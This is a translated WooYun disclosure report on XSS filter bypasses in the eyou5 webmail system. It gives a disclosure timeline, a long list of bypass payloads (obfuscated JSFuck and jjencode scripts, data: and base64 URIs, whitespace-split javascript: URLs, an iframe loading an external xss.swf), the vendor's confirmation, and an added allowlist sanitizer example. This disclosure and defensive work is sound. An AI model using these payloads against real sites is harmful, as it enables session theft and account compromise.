WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2014-06-30: Details sent to the vendor; awaiting vendor handling
2014-07-01: Vendor confirmed; details disclosed to the vendor only
2014-07-04: Details opened to third-party security partners
2014-08-25: Details disclosed to core white hats and experts in related fields
2014-09-04: Details disclosed to regular white hats
2014-09-14: Details disclosed to intern white hats
2014-09-28: Details disclosed to the public
RT (as the title says)
The older versions never had any XSS defense at all, so I never felt it was worth submitting. Recently I noticed that one of the eyou mailboxes I have at hand had been upgraded to eyou5, and that the new version has started filtering XSS, so I tested it and found a small problem. #1 Testing a single XSS attack vector, e.g.:
<img src=x onerror=alert(1)>
is still blocked. #2 But once the situation gets a little more complex, your filter rules can no longer hold up. E.g.:
<script>alert(0)</script><script>confirm(1)</script><script>prompt(2)</script><script>\u0061\u006C\u0065\u0072\u0074(3)</script> <script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script><script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.$_$+")"+"\"")())();</script><script>+alert(6)</script> <script test>alert(7)</script> 
<script>alert(/8/)</script><script src=data:text/javascript,alert(9)></script><script src=data:text/javascript,alert(10)></script><script>alert(String.fromCharCode(49,49))</script><script>alert(/12/.source)</script><script>setTimeout(alert(13),0)</script><script>document['write'](14);</script><anytag onmouseover=alert(15)>M<anytag onclick=alert(16)>M<a onmouseover=alert(17)>M<a onclick=alert(18)>M<a href=javascript:alert(19)>M<button/onclick=alert(20)>M<form><button formaction=javascript:alert(21)>M<form/action=javascript:alert(22)><input/type=submit><form onsubmit=alert(23)><button>M<img src=x onerror=alert(24)><body/onload=alert(25)><body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																27
																	%29></iframe><iframe src="http://0x.lv/xss.swf"></iframe> <iframe/onload=alert(document.domain)></iframe><IFRAME SRC="javascript:alert(29);"></IFRAME><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E"><object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object><object data="javascript:alert(document.domain)"><marquee onstart=alert(30)></marquee><isindex type=image src=1 onerror=alert(31)><isindex action=javascript:alert(32) type=image><input onfocus=alert(33) autofocus><input onblur=alert(34) autofocus><input autofocus><INPUT TYPE="IMAGE" SRC=x onerror=alert(35)><select onfocus=alert(36) autofocus><textarea onfocus=alert(37) autofocus></textarea><keygen onfocus=alert(38) autofocus> <FRAMESET><FRAME SRC="javascript:alert(document.domain);"></FRAMESET><frameset onload=alert(40)><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"></embed> <embed src=javascript:alert(document.domain)> <math href="javascript:alert(45)">M<math> <maction actiontype="" xlink:href="javascript:alert(46)">M<math xlink:href=javascript:alert(47)>M
When faced with somewhat more complex scenarios, your filter rules can no longer hold up.
Because this is a design problem in the filter itself, I believe every one of your versions has this flaw. If you have difficulty reproducing it, you can contact me via a WooYun private message.
Rework the filter rules.
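One way to rework the filter along the lines the report asks for, added here as an example (this is not eyou's filter and not code from the report): rather than recognizing known-bad vectors one at a time, an allowlist sanitizer escapes every tag that is not on a short allowlist, drops every attribute that is not explicitly permitted (so every `on*` handler, `formaction` and `style` disappears whatever the tag), and admits `href`/`src` only when the value, after numeric-entity decoding and a control-character check, carries an `http`, `https` or `mailto` scheme. The allowlist, the `isSafeUrl` policy and the sample inputs (a constructed subset of the vectors listed above) are assumptions of this example; the tag and attribute regexes are a teaching-grade tokenizer, not a full HTML5 parser, and a production mail client should use a maintained sanitizer such as DOMPurify.

```javascript
// Allowlist-based HTML sanitizer (added example; not eyou's filter).
// Design: anything not explicitly permitted is escaped or dropped, so the
// combined and obfuscated vectors above never reach an "is this bad?" test.
const ALLOWED_TAGS = {
  b: [], i: [], u: [], p: [], br: [], ul: [], ol: [], li: [],
  a: ['href'],           // assumed allowlist for a mail-body context
  img: ['src', 'alt'],
};
const SAFE_SCHEME = /^(https?|mailto):/i; // assumed policy: no relative URLs, no data:

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

function codePointToString(cp) {
  return cp <= 0x10ffff ? String.fromCodePoint(cp) : '\ufffd';
}

// Decode &#106; / &#x6A; style entities so "&#106;avascript:" is judged the
// way a browser would interpret it, not the way it looks in the source.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePointToString(parseInt(h, 16)))
          .replace(/&#(\d+);?/g, (_, d) => codePointToString(parseInt(d, 10)));
}

// Browsers drop tabs and newlines inside a URL scheme ("j\n\ta\tv..." is read
// as "javascript:"), so any embedded control character is rejected outright
// instead of being normalized away.
function isSafeUrl(value) {
  const decoded = decodeNumericEntities(value.trim());
  if (/[\u0000-\u0020\u007f]/.test(decoded)) return false;
  return SAFE_SCHEME.test(decoded);
}

function sanitizeHtml(input) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  // Attribute names as the HTML tokenizer sees them: no whitespace, quotes,
  // '/', '=' or '>'; this is why "<button/onclick=" still yields "onclick".
  const attrRe = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(input)) !== null) {
    out += escapeText(input.slice(last, m.index)); // text between tags
    last = tagRe.lastIndex;
    const [raw, slash, rawName, attrText] = m;
    const name = rawName.toLowerCase();
    // hasOwnProperty, so "<constructor>" does not hit Object.prototype.
    const allowedAttrs = Object.prototype.hasOwnProperty.call(ALLOWED_TAGS, name)
      ? ALLOWED_TAGS[name] : undefined;
    if (allowedAttrs === undefined) {              // unknown tag: render as text
      out += escapeText(raw);
      continue;
    }
    if (slash) { out += `</${name}>`; continue; }
    let attrs = '';
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(attrText)) !== null) {
      const attrName = a[1].toLowerCase();
      if (!allowedAttrs.includes(attrName)) continue; // drops on*, style, formaction, ...
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if ((attrName === 'href' || attrName === 'src') && !isSafeUrl(value)) continue;
      attrs += ` ${attrName}="${escapeText(value)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  out += escapeText(input.slice(last));
  return out;
}

// Constructed sample inputs: a subset of the vectors quoted in the report.
const SAMPLES = [
  '<img src=x onerror=alert(1)>',
  '<a href=javascript:alert(19)>M<button/onclick=alert(20)>M',
  '<a href="&#106;avascript:alert(1)">M</a>',
  '<a href="j\na\tv\ta\ts\tc\tr\ti\tp\tt:alert(27)">M</a>',
  '<script>alert(0)</script><script>confirm(1)</script>',
  '<img src="https://example.com/a.png" alt="logo" width=1>',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', sanitizeHtml(s));
```

The design choice worth noting is that the sanitizer never asks "does this look like an attack?"; every decision is "is this on the allowlist?", which is why adding more vectors to the input does not change the outcome. The price is strictness: relative image URLs and unknown but harmless tags are escaped, so the allowlist has to be tuned to what the mail body legitimately needs.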
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2014-07-01 17:58
Confirmed to exist in certain versions; a similar issue was submitted earlier through another platform and a fix already exists. We will contact the customers and correct it as soon as possible. Many thanks for reporting!
None yet